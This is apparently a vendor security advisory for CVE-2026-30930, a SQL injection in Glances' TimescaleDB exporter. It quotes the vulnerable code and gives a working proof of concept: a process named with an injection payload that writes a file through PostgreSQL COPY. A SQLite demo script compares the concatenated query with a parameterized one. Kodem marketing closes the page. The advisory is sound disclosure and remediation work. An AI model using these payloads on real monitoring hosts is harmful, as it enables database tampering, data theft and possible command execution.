CVE-2026-30930

CVE-2026-30930 is a high-severity SQL injection vulnerability in Glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.

Summary

The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.

Root Cause: The normalize() function returns f"'{value}'" for string values without escaping single quotes inside the value. The resulting literals are concatenated into INSERT statements via string formatting and passed straight to cur.execute(); no parameterized queries are used, and the table name ({plugin}) is interpolated as well. Because psycopg's execute() accepts several statements in one string, a quote-terminating payload can append arbitrary statements after the INSERT.

Affected Code

  • File: glances/exports/glances_timescaledb/__init__.py, lines 79-93 (normalize function)
def normalize(self, value):
    """Normalize the value to be exportable to TimescaleDB."""
    if value is None:
        return 'NULL'
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        # Special case for list of one boolean
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ', '.join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"  # <-- NO ESCAPING of single quotes within value

    return f"{value}"
  • File: glances/exports/glances_timescaledb/__init__.py, lines 201-205 (query construction)
# Insert the data
insert_list = [f"({','.join(i)})" for i in values_list]
insert_query = f"INSERT INTO {plugin} VALUES {','.join(insert_list)};"
logger.debug(f"Insert data into table: {insert_query}")
try:
    cur.execute(insert_query)  # <-- Direct execution of concatenated SQL
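The following Python script is an added example, not code from Glances or the upstream 4.5.1 fix. It reproduces the quoting and query construction shown above, feeds it a constructed process record whose name carries an injection payload, and runs the result against an in-memory SQLite database next to a hardened builder that whitelists the table identifier and binds every value as a parameter. The advisory's COPY ... TO payload is PostgreSQL-only, so the payload here creates a table instead; the table layout, row data and the build_safe_insert() helper are assumptions made for the demonstration (the placeholder argument is '?' for sqlite3 and '%s' for psycopg, the driver Glances uses for TimescaleDB).

```python
import re
import sqlite3

# Constructed sample data (not from Glances): a process whose name carries an
# injection payload. The advisory's PoC uses COPY ... TO, which is PostgreSQL
# only; this payload creates a table so the demo runs offline on SQLite.
PAYLOAD = "x'); CREATE TABLE pwned(marker TEXT) --"
SAMPLE_ROWS = [(4242, PAYLOAD), (1, "init")]


def normalize_vulnerable(value):
    """Quoting as in Glances < 4.5.1: string values are wrapped in single
    quotes, but quotes inside the value are never escaped."""
    if value is None:
        return "NULL"
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ", ".join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"
    return f"{value}"


def build_vulnerable_insert(table, rows):
    """INSERT built by string concatenation, mirroring the affected module."""
    insert_list = [f"({','.join(normalize_vulnerable(v) for v in row)})" for row in rows]
    return f"INSERT INTO {table} VALUES {','.join(insert_list)};"


# Hypothetical hardened builder (not the upstream fix): the table name, which the
# original also interpolates, must match a strict identifier pattern, and every
# value travels as a bound parameter instead of being spliced into the SQL text.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_safe_insert(table, rows, placeholder="?"):
    """Return (query, params). placeholder is '?' for sqlite3, '%s' for psycopg."""
    if not IDENTIFIER.match(table):
        raise ValueError(f"refusing unsafe table name: {table!r}")
    if not rows:
        raise ValueError("nothing to insert")
    width = len(rows[0])
    if any(len(row) != width for row in rows):
        raise ValueError("ragged rows")
    row_sql = "(" + ",".join([placeholder] * width) + ")"
    query = f"INSERT INTO {table} VALUES {','.join([row_sql] * len(rows))};"
    params = [value for row in rows for value in row]
    return query, params


def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processlist(pid INTEGER, name TEXT)")
    return conn


def _state(conn):
    """Return (table names, stored process names) so the two paths can be compared."""
    tables = sorted(r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'"))
    names = [r[0] for r in conn.execute("SELECT name FROM processlist ORDER BY rowid")]
    return tables, names


def run_vulnerable(rows=SAMPLE_ROWS):
    """Execute the concatenated query. sqlite3.execute() refuses stacked
    statements, so executescript() is used to match what cur.execute() does on a
    psycopg connection, where several statements in one string are accepted."""
    conn = _fresh_db()
    conn.executescript(build_vulnerable_insert("processlist", rows))
    return _state(conn)


def run_safe(rows=SAMPLE_ROWS):
    """Execute the parameterized query: the payload is stored verbatim as data."""
    conn = _fresh_db()
    query, params = build_safe_insert("processlist", rows)
    conn.execute(query, params)
    conn.commit()
    return _state(conn)


if __name__ == "__main__":
    print(build_vulnerable_insert("processlist", SAMPLE_ROWS))
    print("concatenated:", run_vulnerable())
    print("parameterized:", run_safe())
```

Running the script shows the concatenated path terminating the string literal at `x'`, executing the attacker's second statement, and commenting out the rest of the row data (the second row never arrives), while the parameterized path inserts both rows with the payload stored as an ordinary string. The same split applies on PostgreSQL: identifiers through psycopg's sql.Identifier, values through parameters.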

PoC

  • As a normal user, create a process whose name contains the SQL injection payload. exec -a replaces the calling shell with the new process, so run this in a subshell or a separate terminal; the busy loop only keeps the process alive so it appears in the process list:
exec -a "x'); COPY (SELECT version()) TO '/tmp/sqli_proof.txt' --"   python3 -c 'import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]'
  • Start Glances with TimescaleDB export as root user:
glances --export timescaledb --export-process-filter ".*" --time 5 --stdout cpu
  • Observe that sqli_proof.txt is created in the /tmp directory. COPY ... TO writes on the PostgreSQL server's filesystem and requires the export role to be a superuser or a member of pg_write_server_files, so this step assumes Glances and TimescaleDB run on the same host with such a role; with a less privileged role the injected statement still runs but will fail on permissions, which is visible in the Glances debug log and the PostgreSQL server log.

Impact

  • Data Destruction: DROP TABLE, DELETE, and TRUNCATE against the TimescaleDB database, limited only by the export role's privileges.
  • Data Exfiltration: Using COPY ... TO or subqueries to read data from other tables reachable by the export role.
  • Potential RCE: Via COPY ... PROGRAM, a built-in PostgreSQL feature that executes OS commands on the database server when the role is a superuser or a member of pg_execute_server_program.
  • Privilege Escalation: Any local user who can create a process with a crafted name (or otherwise control a monitored string such as a mount point, interface or container name) can inject SQL that runs with the database credentials configured for Glances, potentially compromising the entire PostgreSQL instance.

Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.

Affected versions

Glances (< 4.5.1)

Security releases

Glances → 4.5.1 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade Glances to 4.5.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30930? CVE-2026-30930 is a high-severity SQL injection vulnerability in Glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
  2. Which versions of Glances are affected by CVE-2026-30930? Glances (pip) versions < 4.5.1 are affected.
  3. Is there a fix for CVE-2026-30930? Yes. CVE-2026-30930 is fixed in 4.5.1. Upgrade to this version or later.
  4. Is CVE-2026-30930 exploitable, and should I be worried? Whether CVE-2026-30930 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-30930 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-30930? Upgrade Glances to 4.5.1 or later.

Other vulnerabilities in Glances

CVE-2026-53925, CVE-2026-46611, CVE-2026-46608, CVE-2026-46607, CVE-2026-46606
